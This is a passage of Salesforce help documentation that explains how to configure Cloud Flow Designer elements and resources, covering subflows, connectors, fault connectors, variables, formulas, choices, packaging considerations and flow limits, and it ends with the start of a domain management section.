From a subflow element, you can only assign values to or from the referenced flow’s variables that allow input/output
access. This access is determined by the Input/Output Type of the variable. If you need to change the variable’s
Input/Output Type, open the referenced flow to edit the variable.

See Also:
Adding and Configuring a Subflow Element
Putting Flows to Work

Adding and Configuring a Subflow Element
Use a subflow element to have the flow call another flow at runtime.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Before you begin, create or install the other flow that you want to call.

A subflow element references another flow and calls that flow at runtime. When a flow contains a subflow element, we call it
the master flow to distinguish it from the referenced flow. Use subflow input and output assignments to transfer data between
the master flow and the referenced flow.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the flow that you want to call onto the canvas.
3. Enter the general settings for the subflow element.

DescriptionField

Helps you identify the element on the canvas.Name

The requirement for uniqueness applies only to elements within the current flow. Two elements
can have the same unique name, provided they are used in different flows. A unique name is

Unique Name

limited to underscores and alphanumeric characters. It must begin with a letter, not include
spaces, not end with an underscore, and not contain two consecutive underscores.
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DescriptionField

Appears after you click Add Description.Description

4. On the Inputs tab, assign values to variables in the referenced flow.

These variable assignments occur when the master flow calls the referenced flow at runtime.

Click Add Row to enter more variable assignments. Click  to remove a row.

DescriptionColumn
Header

Referenced flow’s variable whose value you want to set.

By default, the subflow overlay’s drop-down lists for selecting the referenced flow’s variables are populated
with the variables of the currently active version of the referenced flow. If the referenced flow has no

Target

active version, the drop-down lists are populated with the variables of the latest version of the referenced
flow. You can, however, view or select from the inputs and outputs of other versions of the referenced
flow.

Master flow’s resource or value to assign to the target.

Options:

Source

• Select an existing flow resource, such as a variable, constant, or user input.
• Select CREATE NEW to create a new flow resource.
• Manually enter a literal value or merge field.

If you manually enter a date, you must use the MM/DD/YYYY format.

5. On the Outputs tab, assign values from the referenced flow’s variables to the master flow’s variables.

These variable assignments occur when the referenced flow finishes running.

Click Add Row to enter more variable assignments. Click  to remove a row.

DescriptionColumn
Header

Referenced flow’s variable whose value you want to assign to the target.

By default, the subflow overlay’s drop-down lists for selecting the referenced flow’s variables are populated
with the variables of the currently active version of the referenced flow. If the referenced flow has no

Source

active version, the drop-down lists are populated with the variables of the latest version of the referenced
flow. You can, however, view or select from the inputs and outputs of other versions of the referenced
flow.

Master flow’s variable whose value you want to set.Target
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6. Click OK.

See Also:
Viewing Inputs and Outputs of Other Referenced Flow Versions
Subflows Overview

Viewing Inputs and Outputs of Other Referenced Flow Versions
While configuring a subflow element, you can view the variables of a specified version of the referenced flow.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Before you begin, add a subflow element to your flow.

From a subflow element, you can only assign values to or from the referenced flow’s variables that allow input/output access.
This access is determined by the Input/Output Type of the variable. If you need to change the variable’s Input/Output
Type, open the referenced flow to edit the variable.

By default, the subflow overlay’s drop-down lists for selecting the referenced flow’s variables are populated with the variables
of the currently active version of the referenced flow. If the referenced flow has no active version, the drop-down lists are
populated with the variables of the latest version of the referenced flow.

If you want to populate the drop-down lists with the variables of another version of the referenced flow, or if you just want to
view the descriptions of the referenced flow’s variables, complete the following steps.

1. On the subflow overlay, expand the Input/Output Variable Assignments section.
2. Click View input/output of other versions.
3. Use one or more of the following options in the Select Version of Referenced Flow overlay.

DescriptionOption

The Inputs and Outputs tabs display the variables in the selected version
of the referenced flow.

Select a Version number in the left pane.

The tab displays:Select the Inputs tab or the Outputs tab.
• The variables available for input or output assignment in the selected

Version of the referenced flow.
• The data type of each variable.
• The description, if any, of each variable.

The subflow overlay’s drop-down lists for selecting the referenced flow’s
variables are populated with the variables of the selected Version of the
referenced flow.

Click OK.
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When you configure subflow input and output assignments, you can specify variables from any version of the referenced flow.
This enables you to develop both the master flow and referenced flow in parallel, while keeping another version of the referenced
flow active for its users. When you save the master flow, however, the subflow validations are performed only against the
currently active version—or if there is no active version, then against the latest version—of the referenced flow. You may see
informational validation messages about the variables that couldn’t be found or that were configured differently in the referenced
flow, but those messages won’t block you from saving the flow. Nevertheless, be sure to resolve all validation errors before you
activate the master flow.

See Also:
Adding and Configuring a Subflow Element
Subflows Overview

Adding and Configuring a Step Element

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use the Step element as a placeholder when you're not sure what kind of element you need. Using Step elements, you can
sketch out a draft of any new flow or make conceptual changes to an existing flow.

To add or edit a Step element in the Flow Designer:

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Palette, drag the Step element into the main area of the canvas.
3. Enter a name for the Step.
4. If you haven’t already added a description, click Add Description to do so.
5. Click OK to accept your changes or Cancel to discard them.

Steps aren't valid elements for active flows. You can have a draft flow with Steps in it and can run it in the draft state as an
administrator, but you must replace the Steps with other elements before you can activate the flow and let users run it.

Converting a Step into a Screen

You can convert a Step into a Screen element at any time by hovering your mouse over it and clicking .

Things to note about converting Step elements:

• Upon conversion, a Step's incoming connectors are preserved, but any outgoing connectors assigned to it are deleted.
• After conversion, you can no longer use the Step's original unique name.

See Also:
Adding and Configuring a Screen Element
Flow Designer Elements
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Connector Element Overview

Available in: Enterprise, Unlimited, and Developer Editions

Connectors control how the flow is executed and are represented as arrows on the Flow Designer canvas.

Adding and Deleting Connectors

To add a connector between flow elements, click the node beneath the source element and drag and drop a line anywhere
onto a target element. To delete a connector, select it and press the DELETE key. If the source element has defined outcomes,
when you drop the connector onto its destination, you must select which outcome to assign to the path.

Tip:

• When you select a connector, its color changes from gray to green.
• You might find it easier to select a connector by clicking and dragging an area on the canvas that includes both

ends of the connector.

Connector Properties and Expected Behavior

• When you click and drag an element around the canvas, each end of the connector stays stuck to its element and stretches
to accommodate the new element position. If you move the element into a new position in the flow, you must manually
adjust any connections and outcomes.

• Deleting a connector doesn't delete the outcome associated with it, but deleting an element's outcome does delete the
associated connector.

• Only Decisions, Steps and data elements can have more than one outgoing connector.

Some elements also support an outgoing fault connector.

• The source and destination elements for a connector can't be the same.

See Also:
Fault Connector Overview
Flow Designer Elements

Fault Connector Overview
While a connector element determines the normal path of flow execution, a fault connector is executed at runtime only when
its source element results in an error.

Available in: Enterprise, Unlimited, and Developer Editions

A fault connector can have any target element but only the following source elements:

• Apex Plug-In

• Record Create
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• Record Update

• Record Lookup

• Record Delete

By default, if executing one of these elements results in an error, the flow displays a generic error message to the flow user.
Also, the user can’t proceed with the flow. Use fault connectors to gracefully handle such errors. For example:

• Suppose an Apex plug-in element calls an external Web service to validate user-entered addresses. If the Web service call
fails for any reason, the flow can proceed along the fault connector to a screen where the user can verify the entered address,
make any corrections, and proceed with the flow.

• If the flow is used only internally, for example by call center users, each fault connector’s target screen can display a system
fault message that flow users can give to the IT department. For example, you can set up a Display Text field on the screen
as follows:

Sorry, but you can’t update records at this time.
Please open a case with IT, and include the following error message:
{!$Flow.FaultMessage}

• You can ignore the errors completely, and have the flow proceed along the normal path. To do this, add a fault connector
on top of the connector element.

Add and delete a fault connector just as you would add and delete a connector element, only you need to add the connector
element first. The connector element properties and expected behavior also apply to fault connectors.

See Also:
Connector Element Overview
Flow Designer Elements

Flow Designer Resources
Available in: Enterprise, Unlimited, and Developer Editions

Resources, such as variables, constants, or formulas, allow you to store or manipulate data and use it throughout your flow.
For example, if a user inputs the cost of a meal in a tip calculator flow, you can store that value as a constant and use it with
a formula to calculate optimum tip amount based on what service level the user chooses later in the flow.

Resources are non-visual elements. They won't show up on your canvas and can't be added to it. If you need to edit or delete
resources you’ve created, you can find them on the Explorer tab.

The following resources are available in the Cloud Flow Designer:

• Constant

• Variable

• Formula

• Text Template

• Choice

• Dynamic Choice
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• Global Constants

Though they don’t appear on the Resources tab, global constants are considered to be resources. Global constants have
fixed values, while the other resources can be created and customized as needed.

Note: Every time you add an element or resource to a flow, it's also added to the Explorer tab.

See Also:
Flow Designer Overview

Adding and Configuring a Constant

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

In order to assign constants to your flow using the Assignment element, you first need to create them. The Constant resource
allows you to a define a fixed value that can be used throughout your flow. Every time you create a new constant, it is added
to the Explorer tab by its unique name.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Resources tab, double-click Constant.
3. Enter a Unique Name for the constant.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows. A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

4. Enter a description.
5. Set the Data Type for the constant.
6. Enter a value for the constant. When entering a date value, you must use the MM/DD/YYYY format.
7. Click OK to accept your changes or Cancel to discard them.

See Also:
Flow Designer Resources
Adding and Configuring an Assignment Element
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Adding and Configuring a Formula

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use the Formula resource to calculate a value using numeric elements in your flow. Every time you create a new formula, it’s
added to the Explorer tab by its unique name.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Resources tab, double-click Formula.
3. Enter a Unique Name for the formula.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows.A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

4. Enter a description.
5. If needed, set the Scale for the formula. The scale is the maximum number of digits allowed to the right of the decimal

point. This number can't exceed 17. If you leave this field blank or set to zero, only whole numbers are displayed when
your flow runs.

6. Enter your formula.

Use the arrowhead to select resources from your flow. Use the CREATE NEW section of the drop-down list to create
new resources, if necessary.

For a complete list of operators and functions for building formulas in Salesforce, see Formula Operators and Functions
on page 3037.

Note:  Some formula operators are not supported in the Cloud Flow Designer and will result in your formula
returning a null value. See Flow Formulas Overview for the complete list.

7. Click OK to accept your changes or Cancel to discard them.

See Also:
Flow Formulas Overview
Flow Designer Resources
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Flow Formulas Overview

Available in: Enterprise, Unlimited, and Developer Editions

You can use standard Salesforce formula syntax in two places within a flow:

• In a Formula resource

• In a Screen element, specifically to validate user input for a field

The Formula Resource

The Formula resource calculates a numeric value using functions and elements in your flow. Consider the following when
creating a Formula resource.

• You can use pure text functions in your formula, but the formula output must be numeric. Any formula that doesn't resolve
to a number or that contains an unsupported function returns null.

• If you include an invalid formula resource in a Display Text screen field, the formula result is displayed to the user as an
empty string.

• You can't activate a flow that contains an invalid formula.

Formulas for Validating Flow User Input

You can use a formula to validate flow user input by selecting Validate when configuring an input field on a Screen element.

• The formula expression must return a Boolean value.
• If the formula statement evaluates to TRUE, the input is valid. If the formula statement evaluates to FALSE, the error

message is displayed to the user.
• If the user leaves the field blank, and the field is not required, no validation is performed.
• Examples of formulas for validating flow user input:

◊ Validate the format of an email address:

REGEX({!Email_Address},"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4}")

◊ Validate the format of a zip code:

REGEX({!Zipcode},"\\d{5}(-\\d{4})?")

Flow Formula Limitations

• A formula in a flow can't contain more than 3,000 characters.
• Formulas in flows don't support the following functions. Using these functions results in your formula returning null.

◊ GETRECORDIDS
◊ IMAGE
◊ INCLUDE
◊ INCLUDES
◊ ISCHANGED
◊ ISNEW
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◊ ISPICKVAL
◊ PARENTGROUPVAL
◊ PREVGROUPVAL
◊ PRIORVALUE
◊ REQUIRE SCRIPT
◊ VLOOKUP

For a complete list of operators and functions for building formulas in Salesforce, see Formula Operators and Functions on
page 3037.

See Also:
Adding and Configuring a Formula

Adding and Configuring a Text Template

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

Use the Text Template resource to create text to use in your flow. For example, if you have a flow that registers people for an
event, you could create a text template that includes a registrant's name, address, and other information, then use the template
in an email confirmation sent out when the flow finishes. Every time you create a new text template, it is added to the Explorer
tab by its unique name.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Resources tab, double-click Text Template.
3. Enter a Unique Name.

Note: The requirement for uniqueness applies only to elements within the current flow. Two elements can have
the same unique name, provided they are used in different flows.A unique name is limited to underscores and
alphanumeric characters. It must begin with a letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores.

4. Enter a description.
5. In the text box, type the text for your template. Use the Select resource drop-down to insert content from your flow

(variables, constants, user input, and so on), or type it manually. Use the CREATE NEW section of the drop-down list
to create new resources, if necessary.

Click  to switch between the plain text editor and the rich text editor. Using the rich text editor saves the content as
HTML.
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6. Click OK.

See Also:
Flow Designer Resources

Adding and Configuring a Variable

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

In order to assign variables to your flow using the Assignment element, you have to first create them. The Variable resource
allows you to create updatable values to use in your flow. Every time you create a new variable, an item representing that
variable is added to the Explorer tab.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. From the Resources tab, double-click Variable.
3. Fill out the fields.

DescriptionField

The requirement for uniqueness applies only to elements within the current flow. Two
elements can have the same unique name, provided they are used in different flows. A unique

Unique Name

name is limited to underscores and alphanumeric characters. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores.

Helps you determine when to assign or use this variable as you set up your flows.

The description appears in the Description pane when the variable is selected in the Explorer
tab. Depending on the Input/Output Type, the variable’s description may be viewed
from another flow’s subflow element.

Description

Determines the types of values that can be assigned to the variable.Data Type

Appears only when the Data Type is set to Number or Currency.

The scale is the maximum number of digits allowed to the right of the decimal point. This
number can't exceed 17. If you leave this field blank or set to zero, only whole numbers are
displayed when your flow runs.

Scale

Determines whether the variable can be accessed outside the flow.Input/Output Type

• Private—Variable can be assigned and used only within the flow.
• Input—Variable can be set at the start of the flow using URL parameters, Visualforce

controllers, or subflow inputs.
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• Output—Variable’s value can be accessed from Visualforce controllers and other flows.

This field doesn’t affect how variables are assigned or used within the same flow, for example,
through these types of elements: Assignment, Record Create, Record Lookup, and Apex
Plug-in.

The default value of the field depends on the release or API version in which the variable
is created:

• Private for a variable created in Summer ’12 and later or in API version 25.0 and later.
• Input and Output for a variable created in Spring ’12 and earlier or in API version

24.0.

Warning:  Disabling input or output access for an existing variable may impact the
functionality of applications and pages that call the flow and access the variable via
URL parameters, Visualforce controllers, and subflows.

Enter a default value for the variable, or use the drop-down list to assign the value of a flow
resource as the default. Use the CREATE NEW section of the drop-down list to create

Default Value

new resources, if necessary. If you leave this field blank, the variable value is set to null.
When entering a date value, you must use the MM/DD/YYYY format.

4. Click OK to accept your changes or Cancel to discard them.

You can delete a variable at any time. Any variable assignments and allocations using the deleted variable will be set to null.

See Also:
Flow Designer Resources
Adding and Configuring an Assignment Element

Adding and Configuring a Choice

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

A Choice resource is a standalone choice option that you can reference or reuse throughout your flow. For example, if you
have a flow asking users to choose a particular service level, you could create separate choice options for Gold, Silver, and
Bronze. Each one becomes a unique choice resource on the Explorer tab. You could then set up a Screen later on in the flow
with a display text field that includes the choice resource with a description of the features included.

You can create a choice resource in two ways:

• From the Resources tab—Double-click Choice in the resources list.
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• From anywhere the CREATE NEW drop-down list option is available.

On the Choice overlay:

1. Enter a label for the choice field.
2. If you want to use the rich text editor to format your field label, click the rich text editor icon ( ) to the right of the Label

field.

a. Once you’re done editing the text, click OK. The Label field display changes to indicate that it is now a rich text field.

b. Click Edit to make changes to your label text.
c. Click Clear to completely clear the Label field and start over.

3. If necessary, customize the Unique Name.
4. If you haven’t already added a description, click Add Description to do so.
5. Set the choice’s Value Data Type.
6. If desired, fill in a Stored Value.

If a user leaves a choice blank or unselected, its stored value is set to null.

7. Select the Show input on selection checkbox to have a user input field appear below the choice option. This option
isn’t available if the choice’s data type is Boolean.

a. Enter a label for the user input field.
b. Select the Required checkbox to make the user input field required.
c. In the Input Validation section, create a formula expression to validate the user input for the field.

i. Select Validate.
ii. Enter a formula expression to define the values allowed for the field.
iii. Customize the error message that will be displayed to the flow user if the input fails validation.

Click  to switch between the plain text editor and the rich text editor. Using the rich text editor saves the content
as HTML.

Note:

• If the formula statement evaluates to TRUE, the input is valid. If the formula statement evaluates to FALSE,
the error message is displayed to the user.

• If the user leaves the field blank, and the field is not required, no validation is performed.

8. Click OK.

After you create a choice, it shows up on the Explorer tab, where you can edit it as needed.

See Also:
Flow Designer Resources
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Adding and Configuring a Dynamic Choice

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Force.com Flow”To open, edit, or create a flow in the Cloud Flow Designer:

A dynamic choice looks up data from an object’s records and dynamically generates a set of choices at runtime. Throughout
your flow, you can reuse a Dynamic Choice resource for choice fields, and you can reference the stored value of a Dynamic
Choice resource. The stored value is determined by the most recent user selection of a choice within the generated set.

As an example, let's say you're setting up a flow for all employees of Acme Inc. and need them to identify which Acme division
they work in. Instead of manually entering each division name as a separate choice, you could set up the dynamic choice to
look up all instances where “Acme” appears in the division name. Then, when the employees step through the flow, they can
select from a dynamically generated choice list of all division names containing “Acme”.

1. From Setup, click Create > Workflow & Approvals > Flows and open a new or existing flow.
2. Create a dynamic choice using one of the following methods:

• From the Resources tab, double-click Dynamic Choice.
• From the Screen overlay, add or select a choice field in the preview pane. In the Choice Settings for that field, select

CREATE NEW > Dynamic Choice
• From any resource-selecting drop-down list, select CREATE NEW > Dynamic Choice.

3. Enter the general settings for the choice.

DescriptionField

The requirement for uniqueness applies only to elements within the current flow. Two
elements can have the same unique name, provided they are used in different flows. A unique

Unique Name

name is limited to underscores and alphanumeric characters. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores.

Appears after you click Add Description.Description

Data type of the choice’s stored value.Value Data Type

4. Select the object whose records contain the data for the generated choices.
5. Specify the filter criteria for retrieving records from the database.

Click Add Row to enter more filters. Click  to remove a row.

DescriptionColumn Header

Field for filtering records.Field

The available filter operators depend on the data type selected for the Field and Value.Operator
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DescriptionColumn Header

The Field and Value in the same row must have the same data type.

Options:

Value

• Select an existing flow resource, such as a variable, constant, or user input.
• Select CREATE NEW to create a new flow resource.
• Manually enter a literal value or merge field.

If you manually enter a date, you must use the MM/DD/YYYY format.

If you remove all filter rows, all records of the selected object are retrieved and a choice is generated for each record.

6. Select the records’ fields whose values you want to use in the generated choices.

DescriptionField

Record’s field whose value appears as the choice label at runtime.

Make sure to choose a field that contains data. Otherwise, users see blank generated choices
at runtime.

Choice Label

Record’s field whose value is stored when the user selects this choice at runtime.

The available options depend on the Value Data Type of the Dynamic Choice resource.

Choice Stored Value

If you don’t fill out this field, the stored value is set to null.

For example, let's say you're setting up a support flow for a computer hardware manufacturer, and you want to let users
identify a product to find its latest drivers. You could set up a dynamic choice that displays all products whose product ID
starts with a specific string of characters. However, since the flow users are more likely to know the product's name than
its ID, you would select a field containing the product name for the Choice Label.

7. To sort the generated choices:

a. Select Sort results by.
b. Select the record’s field to sort by. Only sortable fields appear in the drop-down list.
c. Select the sort order, either ascending or descending.

8. To limit the number of generated choices:

a. Select Limit number of choices to.
b. Enter the maximum number of choices (up to 200) to include in the generated set.

9. Set up field assignments that occur at runtime when the user selects a choice from the generated set. Use flow variables to
store field values from the record associated with the user-selected choice.

Click Add Row to enter more field assignments. Click  to remove a row.

DescriptionColumn Header

Record’s field whose value you want to assign to a variable.Field
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DescriptionColumn Header

Select an existing flow variable, or select CREATE NEW to create a new variable.Variable

Note: When the dynamic choice is used in a multi-select choice field, flow variables store the field values of only
the last selected record in the dynamically generated set of choices. If the dynamic choice is used in multiple
multi-select choice fields on the same screen, the flow variable assignments are determined by the first multi-select
choice field on the screen.

Let’s return to our example where the flow user selects a product name from the generated set of choices. If, elsewhere in
the flow, you want to refer to or display the associated product ID and product description, you would assign flow variables
to store the relevant field values from the user-selected record.

10. Click OK.

After you create a dynamic choice, it is available on the Explorer tab.

See Also:
Adding and Configuring a Screen Element
Flow Designer Resources

Global Constants Overview

Available in: Enterprise, Unlimited, and Developer Editions

In any value or resource drop-down list in the Cloud Flow Designer, you may see a section called GLOBAL CONSTANT.
Global constants are system values that, depending on the context of the drop-down list, let you assign EmptyString, True,
or False as the value for that field.

For example, when creating a variable of type Boolean, if you click on the arrow button to the right of the Default Value
field and expand the GLOBAL CONSTANT section, you’ll see $GlobalConstant.True and $GlobalConstant.False.
However, when creating a variable of type Currency, the GLOBAL CONSTANT section isn’t available. Visibility of this
section depends on the data type of the resource you’re working with.

Available global constants:

• {!$GlobalConstant.True}—available for resources of type Boolean
• {!$GlobalConstant.False}—available for resources of type Boolean
• {!$GlobalConstant.EmptyString}—available for resources of type Text
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Note:  At runtime, {!$GlobalConstant.EmptyString} and null are treated as separate, distinct values. For
example:

• If you leave a text field or resource value blank, that value is null at runtime. If you instead want the value to be
treated as an empty string, set it to {!$GlobalConstant.EmptyString}.

• For a condition in a Decision element, use the is null operator to check whether a value is null. If the condition
compares two text variables, make sure their default values are correctly either set to
{!$GlobalConstant.EmptyString} or left blank (null).

See Also:
Flow Designer Resources

Flows in Change Sets and Packages
Available in: Enterprise, Unlimited, and Developer Editions

Flows created in the Cloud Flow Designer can be included in both change sets and packages. The recipient organization of
either the change set or package must have Visual Workflow enabled..

Considerations for Flows in Change Sets

• If you plan to deploy a flow using change sets, you must account for limitations in migration support. Make sure your flows
reference only fields and components available in change sets.

• You can only include one version of a flow in a change set.
• If the flow has no active version when you upload the outbound change set, the latest inactive version is used.
• When you view the dependent components for the change set, the Component Dependencies page lists the dependencies

for all versions of the flow. Add all interdependent components for the relevant flow version to the outbound change set.
• An active flow in a change set will be inactive once deployed to its destination. You must manually activate it after

deployment.
• Deploying or re-deploying a flow using change sets will always create a new version of the flow in the destination

organization.

Considerations for Flows in Packages

• If you plan to deploy a flow using packages, you must account for limitations in migration support. Make sure your flows
reference only packageable components and fields.

• Flows can be included in both managed and unmanaged packages.
• You can only package active flows. The active version of the flow is determined when you click to upload a package version.

The upload fails if there aren’t any active versions of the flow.
• When creating a custom button, link, or Web tab to point to a flow installed from a managed package, be sure to include

the namespace in the URL. The URL format is: /flow/namespace/flowuniquename.
• When embedding a flow installed from a managed package in a Visualforce page, you must set the name attribute to this

format: namespace.flowuniquename.
• If you want to update a managed package with a different flow version, activate that version and upload the package again.

You don’t need to add the newly-activated version to the package. However, if you activate a flow version by mistake and
upload the package, you’ll distribute that flow version to everyone. Be sure to verify which version you really want to upload.
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• An active flow in a package will be active once installed. The previous active version of the flow in the destination organization
is deactivated in favor of the newly-installed version. Any in-progress flows based on the now-deactivated version will
continue to run without interruption, but will reflect the previous version of the flow.

• If you install a package containing multiple flow versions in a fresh destination organization, only the latest flow version
included in the package is deployed.

• Upgrading a managed package in your organization installs a new flow version only if there is a newer flow version from
the developer. After several upgrades, you may end up with multiple flow versions

• If you install a flow from an unmanaged package that has the same name but a different version number as a flow already
in your organization, the newly-installed flow becomes the latest version of the existing flow. However, if the packaged
flow has the same name and version number as a flow already in your organization, the package install will fail. You can’t
overwrite a flow.

• Referential integrity works the same for flows as it does for other packaged elements.

When working with flows in packages, consider these limitations:

• The Cloud Flow Designer can’t open flows installed from managed packages.
• You can’t delete a flow from an installed package. To remove a packaged flow from your organization, you must first

deactivate it, wait 12 hours, then uninstall the package.
• In a development organization, you can’t delete a flow or flow version once you’ve uploaded it to a released or beta managed

package.
• You can’t delete flow components from Managed - Beta package installations in development organizations.
• Flows can’t be included in package patches.
• If you have multiple versions of a flow installed from multiple unmanaged packages, you can’t remove only one version by

uninstalling its package. Uninstalling a package—managed or unmanaged—that contains a single version of the flow
removes the entire flow, including all versions.

See Also:
Visual Workflow Overview

Flow Limits
Available in: Enterprise, Unlimited, and Developer Editions

The following limits apply to flows in Salesforce:

50Maximum number of versions per flow

2000Maximum number of executed elements at runtime

500Maximum number of active flows per organization

1000Maximum number of flows per organization
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You can’t run flows if you exceed your organization's Force.com sites limits or Apex execution governors and limits.

See Also:
Visual Workflow Overview

Visual Workflow Considerations
Available in: Enterprise, Unlimited, and Developer Editions

When creating, managing, and running flows, consider the permissions, use limits, and data issues.

The Cloud Flow Designer

• Be careful when testing flows that contain Record Delete elements. Even if the flow is inactive, running it will trigger the
delete operation.

• When entering a date value, you must use the MM/DD/YYYY format.
• The Flow Designer doesn't support UTF-8 encoding for text in user input fields.
• The Flow Designer uses the permissions and locale assigned to the current user.
• The Cloud Flow Designer contains embedded fonts for all locales it supports. The supported locales are:

◊ English (US)
◊ French (France)
◊ German (Germany)
◊ Spanish (Spain)
◊ Japanese (Japan)
◊ Chinese (Traditional)
◊ Chinese (Simplified)

If you enter unsupported characters for a supported locale, they’re displayed using system fonts instead of the embedded
fonts.

In unsupported locales, your system font settings are used to display all characters in the Cloud Flow Designer.

• If the Cloud Flow Designer doesn't show a custom object or field that was recently created, close and reopen it.
• If a user leaves a choice blank or unselected, its stored value is set to null.
• If you have the same choice option used in more than one place on different screens in your flow, a was selected query on

that choice option will always resolve to the most recent one.
• If you have the same choice option with a user input used in more than one place on the same screen, a was selected query

on that choice option will always resolve to the first one.
• If you leave any field or resource value blank, that value is null at runtime.

If you want a text value to be treated as an empty string instead of null, set it to {!$GlobalConstant.EmptyString}.

• Don’t enter the string null as the value of a text field in the Cloud Flow Designer. If you do this, you may not be able
to save the flow.

• The Cloud Flow Designer can’t open flows installed from managed packages.
• If you open a flow from Winter ’12, any Boolean decision it contains is converted to a multi-outcome Decision element

that:
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◊ Uses the same name as the old decision.
◊ Takes the unique name of the old decision, appended with “_switch”.
◊ Has an outcome labeled “True”. This outcome’s unique name matches that of the old decision, and its conditions are

migrated from the True outcome of the old decision.
◊ Has a default outcome labeled “False”.

Flow Administration

• You can’t run flows if you exceed your organization's Force.com sites limits or Apex execution governors and limits.
• If you haven't yet edited the flow properties, and you activate a version of the flow, the name and description fields are

automatically updated to reflect those of the active version. Once you edit the name and description of your flow, the fields
are no longer automatically updated to match the active version.

• When you activate a new version of a flow, the previously activated version (if one exists) is automatically deactivated. Flow
processes currently running continue to run using the version with which they were initiated.

• You can’t delete an active flow. Once deactivated, you must wait 12 hours to delete a flow or flow version. This ensures
that flows in progress have time to complete. Flows that have never been activated can be deleted immediately.

Flow Runtime

• Don't use your browser's Back or Forward buttons to navigate through a flow. This may result in inconsistent data between
the flow and Salesforce.

• A single flow may have up to 50 different versions. When you run a flow, you see the active version, which may not
necessarily be the latest version.

See Also:
Flow Designer Overview

Visual Workflow Terminology
Available in: Enterprise, Unlimited, and Developer Editions

The following terminology is used for Visual Workflow in Salesforce:

Element

Elements are the building blocks of flows. Each element represents an action, such as presenting information to, or
collecting information from, flow users, or even querying, creating, updating, and deleting information in Salesforce. By
connecting elements together in the Flow Designer, you can create a flow, which is a series of screens, inputs, and outputs
through which users navigate.

Flow

A flow starts out as a process or decision diagram created in the Flow Designer. Once uploaded and run in Salesforce,
it becomes an application for navigating users through a series of screens.

Cloud Flow Designer

Cloud-based application that lets administrators create a flow for use in Salesforce.

3271

Visual Workflow TerminologyUsing Visual Workflow



Desktop Flow Designer

Desktop application that allows administrators to create a flow for use in Salesforce.

Master Flow

A master flow is a flow that contains a subflow element. The term “master” is used to distinguish it from the flow that
is referenced and called by the subflow element.

Resource

Resources, such as variables, constants, or formulas, allow you to store or manipulate data and use it throughout your
flow.

Sub Flow

A subflow element references another flow, which it calls at runtime. The flow that contains the subflow element is
referred to as the master flow.

See Also:
Flow Designer Overview
Visual Workflow Overview

CREATING WEBSITES

DOMAIN MANAGEMENT

Domain Management Overview
The Domain Management page allows you to configure domains and their site associations with a high degree of flexibility.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

You must have Site.com, Force.com Sites, or Communities
enabled

To manage domains:

Sites and domains can have a many-to-many relationship. Each domain can have up to 50 sites, and each site can be associated
with up to 10 domains. For example, you might want to set up a single domain to host your Communities, Force.com, and
Site.com sites. This simplifies your domain requirements. For Site.com sites, you might want to host them on the same domain
as your Force.com sites because you can access Visualforce pages and have easier access to Apex code.

3272

Domain Management OverviewCreating Websites



There are also reasons why you would have a site on more than one domain. For example, let’s say you have a parent company
with two distinct brands. Each brand has its own registered domain, but you want them both to point to the parent website.
Because you can have a site exist on more than one domain, you can point both brand domains to a single parent website.

If you plan to host more than one site on a domain, you’ll need to set up custom URLs for each site. Custom URLs are the
way to uniquely distinguish the sites within that domain. Let’s say you have a domain called www.ourdomain.com and you
want to host two sites called siteone and sitetwo. You’ll need to create custom URLs by associating ourdomain.com to
each site using a custom path. This will result in two custom URLs: http://ourdomain.com/siteone and
http://ourdomain.com/sitetwo. When a web user accesses the domain using one of the URLs, the custom path
determines which site within the domain they see.

See Also:
Adding a Domain
Adding a Custom URL
Managing Domains and Custom URLs
Deleting a Domain
Deleting Custom URLs

Adding a Domain
You can add domains and attach certificates using the Domain Management page in Setup.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view domains:

“Customize Application” or “View Setup and Configuration”
plus either a Site.com Publisher license or “Create and Manage
Communities”

To add domains:

“Customize Application”To edit or delete domains:

Contact salesforce.comTo associate certificates with a domain:

When you add a domain, you also have the option of attaching a certificate and key for additional security. If you’re going to
use a certificate, make sure you’ve already added it using Certificate and Key Management before you try to attach it to your
domain. Only CA signed certificates are supported and they must be 2048 bits in length.

To add domains in your organization:

1. From Setup, click Domain Management > Domains.
2. Click Add a Domain.
3. Enter the Domain Name.
4. Add a certificate if you have already generated one for your organization.
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5. Click Save. Alternatively, click Save & New to add multiple domains.

See Also:
